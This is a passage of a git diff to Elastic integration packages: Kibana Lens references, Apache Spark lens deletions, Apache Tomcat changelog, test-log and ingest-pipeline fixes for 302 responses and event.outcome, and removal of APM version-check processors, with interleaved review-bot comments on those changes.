"type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f84a1cd9-1b4b-484e-87f7-953c2f645570:787550e5-b4cd-4892-babc-4f3d33c078ec", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64cbf207-795a-4818-915c-137eaebc6198:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64cbf207-795a-4818-915c-137eaebc6198:indexpattern-datasource-layer-efa9fcdd-f421-4c27-a85b-3a6d2512a09d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64cbf207-795a-4818-915c-137eaebc6198:b8679379-0bbe-4028-b3e7-2cc0f84fa045", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64cbf207-795a-4818-915c-137eaebc6198:97467acb-706a-4078-ae1a-ac6ab5fd47d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:indexpattern-datasource-layer-483b85ff-1b76-41d9-926b-25f70122ef28", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:509e9888-4307-45b6-9c04-5b7feafeef87", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:df5be9fa-fb96-4da2-a042-71b37b7c3275", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:indexpattern-datasource-layer-aec1fa6a-6818-41f0-862a-8c7feed2ea3e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:3fe0b162-ec79-4815-895a-79ac382ca1d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:62857a2d-669f-4c70-9f92-dcab405c9f9a", + "type": "index-pattern" + 
}, + { + "id": "metrics-*", + "name": "b5caa5d1-221e-400d-a11a-ea539f1f4546:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b5caa5d1-221e-400d-a11a-ea539f1f4546:indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b5caa5d1-221e-400d-a11a-ea539f1f4546:1215080a-2795-41e4-a618-d54b0e020cbc", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:indexpattern-datasource-layer-d4698267-4169-47b1-81cd-17bd8621879f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:171181c8-0b9a-4664-85cb-0e8b82132b7a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:6ffc819a-ab7a-43bd-aa18-dbd327428425", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75c23769-a2bd-4825-b20a-d140aeb36175:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75c23769-a2bd-4825-b20a-d140aeb36175:indexpattern-datasource-layer-aa4bc89a-1467-4370-980f-99b6e33890d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75c23769-a2bd-4825-b20a-d140aeb36175:975bff6a-acfa-481f-86ba-7d697e207f65", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75c23769-a2bd-4825-b20a-d140aeb36175:b889078f-52b4-4fdd-8fd5-6a636ff903a6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:indexpattern-datasource-layer-de0d9a21-100f-4912-a985-ca42e4347241", + "type": 
"index-pattern" + }, + { + "id": "metrics-*", + "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:cffd3ad8-723b-4694-bf3e-9d8a826ce05e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:a3034e1f-cb79-4ef6-91f1-ff8b1f2510c8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:indexpattern-datasource-layer-6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:6fdd6b46-a1d0-470b-bf9a-527dc0444653", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:948085ee-3b01-4c26-8bb4-b3c40b02049d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:indexpattern-datasource-layer-530fc85b-0ba7-4f65-862b-a303af533c19", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:e76b86a5-b6ba-4537-a0d1-046096a9807d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:d950973c-f5b8-4aae-857a-e8eccbecd2d6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "78e81e12-c659-4d89-a80d-14ec4e49368a:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "78e81e12-c659-4d89-a80d-14ec4e49368a:indexpattern-datasource-layer-148ce684-6f54-430c-9b71-69989419abd4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "78e81e12-c659-4d89-a80d-14ec4e49368a:c7bd1bca-ca54-4168-8ed5-2e45bd906d13", + "type": "index-pattern" + }, + { + 
"id": "metrics-*", + "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:indexpattern-datasource-layer-87763c10-0d2a-4ff0-afb1-4d261c6c52de", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:7c76ed08-e31a-4d5a-a8a3-d6f7763d3c40", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:fffcc31c-dfa7-4d03-baf5-d0c48357153f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:indexpattern-datasource-layer-7a60dd89-db58-4e7e-b73a-139574b69402", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:a871806a-160b-4da4-bcd5-700175899a73", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:55f22446-ec98-430e-b92e-0660335ab2d9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:indexpattern-datasource-layer-340a830f-a169-4a46-959d-6471aac521f9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:1723d45d-1e3e-422c-921d-06a9ad1d3309", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:59410b0e-e834-4387-b6a8-dd1e252c87c9", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": 
"index-pattern", + "name": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18:indexpattern-datasource-layer-3a277aff-7c7b-443b-bccf-271cb4486f72", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18:e2038555-6ef6-4a33-b50c-c175b2ebbe02", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "0595e44f-e6b0-4d93-868f-040f2eb0de31:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "0595e44f-e6b0-4d93-868f-040f2eb0de31:indexpattern-datasource-layer-5d66805e-b15a-4a65-b914-128afac75b09", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "0595e44f-e6b0-4d93-868f-040f2eb0de31:f4140b61-62cd-4abe-a34e-bb7a1d14fefb", + "id": "metrics-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/apache_spark/kibana/lens/apache_spark-114428e0-c165-11ec-97dc-abb2b7efe8a8.json b/packages/apache_spark/kibana/lens/apache_spark-114428e0-c165-11ec-97dc-abb2b7efe8a8.json deleted file mode 100644 index cff1a4f2ee7..00000000000 --- a/packages/apache_spark/kibana/lens/apache_spark-114428e0-c165-11ec-97dc-abb2b7efe8a8.json +++ /dev/null 
@@ -1,94 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "3a277aff-7c7b-443b-bccf-271cb4486f72": { - "columnOrder": [ - "08a11063-090b-4210-a4e4-30189048b7aa" - ], - "columns": { - "08a11063-090b-4210-a4e4-30189048b7aa": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes Read", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.executor.bytes.read" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "e2038555-6ef6-4a33-b50c-c175b2ebbe02", - "key": "apache_spark.executor.bytes.read", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.executor.bytes.read" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "08a11063-090b-4210-a4e4-30189048b7aa", - "layerId": "3a277aff-7c7b-443b-bccf-271cb4486f72", - "layerType": "data" - } - }, - "title": "Number of Bytes Read [Metrics Apache Spark]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.1.0", - "id": "apache_spark-114428e0-c165-11ec-97dc-abb2b7efe8a8", - "migrationVersion": { - "lens": "8.1.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-3a277aff-7c7b-443b-bccf-271cb4486f72", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e2038555-6ef6-4a33-b50c-c175b2ebbe02", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file 
diff --git a/packages/apache_spark/kibana/lens/apache_spark-478726a0-c165-11ec-97dc-abb2b7efe8a8.json b/packages/apache_spark/kibana/lens/apache_spark-478726a0-c165-11ec-97dc-abb2b7efe8a8.json deleted file mode 100644 index db5867b0782..00000000000 --- a/packages/apache_spark/kibana/lens/apache_spark-478726a0-c165-11ec-97dc-abb2b7efe8a8.json +++ /dev/null 
@@ -1,94 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5d66805e-b15a-4a65-b914-128afac75b09": { - "columnOrder": [ - "55aa8a79-a965-4ad3-bd75-1182fc29570e" - ], - "columns": { - "55aa8a79-a965-4ad3-bd75-1182fc29570e": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes Written", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.executor.bytes.written" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "f4140b61-62cd-4abe-a34e-bb7a1d14fefb", - "key": "apache_spark.executor.bytes.written", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.executor.bytes.written" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "55aa8a79-a965-4ad3-bd75-1182fc29570e", - "layerId": "5d66805e-b15a-4a65-b914-128afac75b09", - "layerType": "data" - } - }, - "title": "Number of Bytes Written [Metrics Apache Spark]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.1.0", - "id": "apache_spark-478726a0-c165-11ec-97dc-abb2b7efe8a8", - "migrationVersion": { - "lens": "8.1.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5d66805e-b15a-4a65-b914-128afac75b09", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f4140b61-62cd-4abe-a34e-bb7a1d14fefb", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file 
diff --git a/packages/apache_spark/manifest.yml b/packages/apache_spark/manifest.yml
index 908df531099..766a86fa8ba 100644
--- a/packages/apache_spark/manifest.yml
+++ b/packages/apache_spark/manifest.yml
@@ -1,7 +1,7 @@
 format_version: "3.0.0"
 name: apache_spark
 title: Apache Spark
-version: "1.0.0"
+version: "1.0.3"
 description: Collect metrics from Apache Spark with Elastic Agent.
 type: integration
 categories:
diff --git a/packages/apache_spark/validation.yml b/packages/apache_spark/validation.yml
index efdb1de132d..bcc8f74ac3a 100644
--- a/packages/apache_spark/validation.yml
+++ b/packages/apache_spark/validation.yml
@@ -1,4 +1,3 @@
 errors:
   exclude_checks:
-    - SVR00004
     - SVR00002
diff --git a/packages/apache_tomcat/changelog.yml b/packages/apache_tomcat/changelog.yml
index 4e1e8dce221..9bbc5974ce4 100644
--- a/packages/apache_tomcat/changelog.yml
+++ b/packages/apache_tomcat/changelog.yml
@@ -1,4 +1,29 @@
 # newer versions go on top
+- version: "1.4.0"
+  changes:
+    - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9321
+- version: "1.3.3"
+  changes:
+    - description: Fix event.outcome for redirection status_codes 3xx.
+      type: bugfix
+      link: https://github.com/elastic/integrations/pull/9348
+- version: "1.3.2"
+  changes:
+    - description: Fix non-matching grok patterns in access log pipeline for 302 errors.
+      type: bugfix
+      link: https://github.com/elastic/integrations/pull/9243
+- version: "1.3.1"
+  changes:
+    - description: Disable secrets for older stack versions due to errors.
+      type: bugfix
+      link: https://github.com/elastic/integrations/pull/9279
+- version: "1.3.0"
+  changes:
+    - description: Enable 'secret' for the sensitive fields, supported from 8.12.
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9009
 - version: "1.2.0"
   changes:
     - description: Improve apache_tomcat.access pipeline performance
@@ -6,7 +31,7 @@
       link: https://github.com/elastic/integrations/pull/8723
 - version: "1.1.1"
   changes:
-    - description: Improve wording on milliseconds in apache_tomcat time field
+    - description: Improve wording on milliseconds in apache_tomcat time field
       type: enhancement
       link: https://github.com/elastic/integrations/pull/8701
 - version: "1.1.0"
diff --git a/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log b/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log
index 0fd8d1d1d81..5df7d49fd0f 100644
--- a/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log
+++ b/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log
@@ -1,4 +1,5 @@
 81.2.69.144 - admin [02/Mar/2023:18:58:17 +0530] "POST /host-manager/images/asf-logo.svg HTTP/1.1" 200 20486 81.2.69.145 + 400 "http://localhost:8080/host-manager/html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" X-Forwarded-For="127.0.0.1, 127.0.0.2"
+81.2.69.144 - admin [02/Mar/2023:18:58:17 +0530] "POST /host-manager/images/asf-logo.svg HTTP/1.1" 302 - 81.2.69.145 + 400 "http://localhost:8080/host-manager/html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" X-Forwarded-For="127.0.0.1, 127.0.0.2"
 81.2.69.144 - admin [02/Mar/2023:18:58:17 +0530] "POST /host-manager/images/asf-logo.svg HTTP/1.1" 200 20486 X 400 "http://localhost:8080/host-manager/html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" X-Forwarded-For="127.0.0.1"
 81.2.69.144 - admin [02/Mar/2023:18:58:17 +0530] "POST /host-manager/images/asf-logo.svg HTTP/1.1" 200 20486 50 "http://localhost:8080/host-manager/html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" X-Forwarded-For=""
 81.2.69.144 - admin [02/Mar/2023:18:58:17 +0530] "POST /host-manager/images/asf-logo.svg HTTP/1.1" 200 20486 81.2.69.145 40 "http://localhost:8080/host-manager/html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" X-Forwarded-For="127.0.0.1, 127.0.0.3"
diff --git a/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log-expected.json b/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log-expected.json
index ff88519e58e..f962cab04f3 100644
--- a/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log-expected.json
+++ b/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log-expected.json
@@ -82,6 +82,85 @@
                 "version": "109.0.0.0"
             }
         },
+        {
+            "@timestamp": "2023-03-02T13:28:17.000Z",
+            "apache_tomcat": {
+                "access": {
+                    "connection_status": "+",
+                    "http": {
+                        "ident": "-",
+                        "useragent": "admin"
+                    },
+                    "ip": {
+                        "local": "81.2.69.145"
+                    },
+                    "response_time": 400.0
+                }
+            },
+            "client": {
+                "ip": [
+                    "127.0.0.1",
+                    "127.0.0.2"
+                ]
+            },
+            "ecs": {
+                "version": "8.7.0"
+            },
+            "event": {
+                "category": [
+                    "web"
+                ],
+                "kind": "event",
+                "module": "apache_tomcat",
+                "original": "81.2.69.144 - admin [02/Mar/2023:18:58:17 +0530] \"POST /host-manager/images/asf-logo.svg HTTP/1.1\" 302 - 81.2.69.145 + 400 \"http://localhost:8080/host-manager/html\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\" X-Forwarded-For=\"127.0.0.1, 127.0.0.2\"",
+                "outcome": "success",
+                "type": [
+                    "access"
+                ]
+            },
+            "http": {
+                "request": {
+                    "method": "POST",
+                    "referrer": "http://localhost:8080/host-manager/html"
+                },
+                "response": {
+                    "status_code": 302
+                },
+                "version": "1.1"
+            },
+            "related": {
+                "ip": [
+                    "81.2.69.144",
+                    "81.2.69.145",
+                    "127.0.0.1",
+                    "127.0.0.2"
+                ]
+            },
+            "source": {
+                "ip": "81.2.69.144"
+            },
+            "tags": [
+                "preserve_original_event"
+            ],
+            "url": {
+                "extension": "svg",
+                "original": "/host-manager/images/asf-logo.svg",
+                "path": "/host-manager/images/asf-logo.svg"
+            },
+            "user_agent": {
+                "device": {
+                    "name": "Other"
+                },
+                "name": "Chrome",
+                "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36",
+                "os": {
+                    "full": "Windows 10",
+                    "name": "Windows",
+                    "version": "10"
+                },
+                "version": "109.0.0.0"
+            }
+        },
         {
             "@timestamp": "2023-03-02T13:28:17.000Z",
             "apache_tomcat": {
diff --git a/packages/apache_tomcat/data_stream/access/elasticsearch/ingest_pipeline/default.yml b/packages/apache_tomcat/data_stream/access/elasticsearch/ingest_pipeline/default.yml
index eac23bc3599..980af1bcd1f 100644
--- a/packages/apache_tomcat/data_stream/access/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/apache_tomcat/data_stream/access/elasticsearch/ingest_pipeline/default.yml
@@ -42,7 +42,7 @@ processors:
       field: _tmp.dissectgrok
       tag: 'grok_parse_log_dissectgrok'
       patterns:
-        - '^%{NUMBER:http.response.status_code} %{POSINT:destination.bytes}( %{GREEDYDATA:_tmp.grok})?$'
+        - '^%{NUMBER:http.response.status_code} (-|%{POSINT:destination.bytes})( %{GREEDYDATA:_tmp.grok})?$'
       on_failure:
         - append:
             field: error.message
@@ -97,11 +97,11 @@ processors:
   - set:
       field: event.outcome
       value: success
-      if: ctx.http?.response?.status_code != null && ctx.http.response.status_code >= 200 && ctx.http.response.status_code < 300
+      if: ctx.http?.response?.status_code != null && ctx.http.response.status_code < 400
   - set:
       field: event.outcome
       value: failure
-      if: ctx.http?.response?.status_code != null && ctx.http.response.status_code >= 400 && ctx.http.response.status_code < 600
+      if: ctx.http?.response?.status_code != null && ctx.http.response.status_code >= 400
   - remove:
       if: ctx.destination?.bytes == '-'
       field: destination.bytes
diff --git a/packages/apache_tomcat/manifest.yml b/packages/apache_tomcat/manifest.yml
index c0efd5eec71..82cc5038332 100644
--- a/packages/apache_tomcat/manifest.yml
+++ b/packages/apache_tomcat/manifest.yml
@@ -1,13 +1,13 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: apache_tomcat
 title: Apache Tomcat
-version: "1.2.0"
+version: "1.4.0"
 description: Collect and parse logs and metrics from Apache Tomcat servers with Elastic Agent.
 categories: ["web", "observability"]
 type: integration
 conditions:
   kibana:
-    version: "^8.8.0"
+    version: "^8.12.0"
 policy_templates:
   - name: Apache Tomcat
     title: Apache Tomcat
@@ -33,6 +33,7 @@ policy_templates:
       - name: password
         type: password
         title: Password
+        secret: true
         multi: false
         required: false
         show_user: false
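Review bot: The new `success` condition in the second pipeline hunk covers every status code below 400, including 1xx and anything below 100, so a zero, negative or decimal value admitted by `%{NUMBER:http.response.status_code}` in the first hunk is labelled a success instead of being left unset. Since detections and dashboards key on event.outcome, bounding the range is cheap: `if: ctx.http?.response?.status_code != null && ctx.http.response.status_code >= 100 && ctx.http.response.status_code < 400`. Dropping the `< 600` upper bound on the failure branch looks deliberate (out-of-range codes now count as failures rather than staying unknown); a one-line comment above that processor saying so would spare the next reader from re-deriving it. The numeric conversion of status_code that these comparisons rely on happens outside this hunk.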
diff --git a/packages/apm/changelog.yml b/packages/apm/changelog.yml
index 1f081ad12d4..bee1e095339 100644
--- a/packages/apm/changelog.yml
+++ b/packages/apm/changelog.yml
@@ -1,11 +1,24 @@
-- version: 8.13.0-preview-1
+- version: 8.13.1-preview-1708411360
   changes:
+    - description: Remove version check
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9185
+- version: 8.13.0
+  changes:
+    - description: Add a new field transaction.profiler_stack_trace_ids to traces-apm
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9080
     - description: Migrate to package-spec v3
       type: enhancement
       link: https://github.com/elastic/apm-server/pull/11822
     - description: Add span.code.stacktrace
       type: enhancement
       link: https://github.com/elastic/apm-server/pull/12096
+- version: 8.12.2
+  changes:
+    - description: Define value for all constant_keyword fields; Use ecs for sampled_traces
+      type: bugfix
+      link: https://github.com/elastic/apm-server/pull/12219
 - version: 8.12.0
   changes:
     - description: Add missing mappings for various fields
diff --git a/packages/apm/data_stream/app_logs/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/app_logs/elasticsearch/ingest_pipeline/default.yml
index ad111db4e2a..75a7e8d4830 100644
--- a/packages/apm/data_stream/app_logs/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/apm/data_stream/app_logs/elasticsearch/ingest_pipeline/default.yml
@@ -6,21 +6,6 @@ processors:
       ignore_failure: true
       ignore_missing: true
       target_field: process.parent.pid
-  - grok:
-      field: observer.version
-      pattern_definitions:
-        DIGITS: (?:[0-9]+)
-      patterns:
-        - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?'
-  - fail:
-      if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13)
-      message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded.
-  - remove:
-      field:
-        - observer.version_major
-        - observer.version_minor
-        - observer.version_patch
-      ignore_missing: true
   - remove:
       field:
         - observer.id
diff --git a/packages/apm/data_stream/app_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/app_metrics/elasticsearch/ingest_pipeline/default.yml
index 98416f1fe6e..221b2ae048c 100644
--- a/packages/apm/data_stream/app_metrics/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/apm/data_stream/app_metrics/elasticsearch/ingest_pipeline/default.yml
@@ -1,21 +1,6 @@
 ---
 description: Pipeline for ingesting APM application metrics.
 processors:
-  - grok:
-      field: observer.version
-      pattern_definitions:
-        DIGITS: (?:[0-9]+)
-      patterns:
-        - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?'
-  - fail:
-      if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13)
-      message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded.
-  - remove:
-      field:
-        - observer.version_major
-        - observer.version_minor
-        - observer.version_patch
-      ignore_missing: true
   - remove:
       field:
         - observer.id
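Review bot: With the `grok`/`fail`/`remove` trio deleted from the app_logs pipeline, a document produced by an APM Server newer than this integration is now ingested without any signal, where the old `fail` processor rejected it with an actionable message; the identical removal appears in app_metrics on this line and in error_logs, internal_metrics, rum_traces and service_destination_10m_metrics on the following lines. Nothing in the hunk records why the gate is no longer needed, so the next reader has to find the `Remove version check` entry (PR 9185) in the changelog hunk above. A comment next to each pipeline's `description`, along the lines of `# No observer.version gate: documents from newer APM Server releases are accepted as-is (see changelog, PR 9185)`, would keep that rationale with the code. Whether a newer server's schema drift now surfaces as mapping errors or is silently dropped is not visible from here and is worth stating in the PR description; the processors list continues outside the hunk.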
diff --git a/packages/apm/data_stream/error_logs/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/error_logs/elasticsearch/ingest_pipeline/default.yml
index 05876a97f07..e3484d01a9c 100644
--- a/packages/apm/data_stream/error_logs/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/apm/data_stream/error_logs/elasticsearch/ingest_pipeline/default.yml
@@ -1,21 +1,6 @@
 ---
 description: Pipeline for ingesting APM error events.
 processors:
-  - grok:
-      field: observer.version
-      pattern_definitions:
-        DIGITS: (?:[0-9]+)
-      patterns:
-        - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?'
-  - fail:
-      if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13)
-      message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded.
-  - remove:
-      field:
-        - observer.version_major
-        - observer.version_minor
-        - observer.version_patch
-      ignore_missing: true
   - remove:
       field:
         - observer.id
diff --git a/packages/apm/data_stream/internal_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/internal_metrics/elasticsearch/ingest_pipeline/default.yml
index 2c0168f20b9..5413becda31 100644
--- a/packages/apm/data_stream/internal_metrics/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/apm/data_stream/internal_metrics/elasticsearch/ingest_pipeline/default.yml
